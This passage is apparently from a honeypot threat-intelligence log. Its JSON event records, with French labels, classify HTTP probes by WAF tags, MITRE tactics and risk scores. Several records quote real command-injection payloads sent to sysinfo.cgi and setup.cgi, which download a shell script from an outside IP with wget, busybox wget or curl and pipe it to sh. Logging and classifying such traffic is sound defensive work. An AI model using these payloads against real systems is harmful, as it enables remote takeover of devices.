\u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022192fc3f82552c79b2e3b5bd8565c9788f1b82ea5\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20\u2026\u0022, \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.1\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 59\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 59}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 59, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20\u2026\u0022, \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.1\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":283},{"id":11809361,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55286,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":41,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022168f355f1e9166b8bc52e0f454202978f12fb305\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 278, \u0022payload_entropy\u0022: 5.066871055758397, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002209e6236b33799eab3e49368564ed81f2853800d9\u0022, \u0022event_fingerprint\u0022: \u00226d4eb3cc0e1d39db175dad00073bf0416135fdfe\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00223e0e87123587f0c05536d7bf857c5069\u0022, \u0022path_pattern_hash\u0022: \u00227a793259e7957dbaff63a0c99d83e638\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022query_string\u0022: \u0022next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022query_string\u0022: \u0022next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\u0022, \u0022payload_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00229ca63e68aa819efa2db74b938cfc9b841703fe5c\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lset\u2026\u0022, \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lset\u2026\u0022, \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_setup\u0022, \u0022http_sensitive_path\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_setup\u0022, \u0022http_sensitive_path\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":278},{"id":11809362,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55288,"dst_port":82,"service":"http","classification":"http_smuggling_probe","waf_score":52,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 409, \u0022payload_entropy\u0022: 5.330845186768155, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 79, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220debf356c17f2232c5b0dcb1f7bd5e6d31c5d0d7\u0022, \u0022event_fingerprint\u0022: \u002246be7d8f39f80a261149ebffcf4c1aeb91d4c093\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, 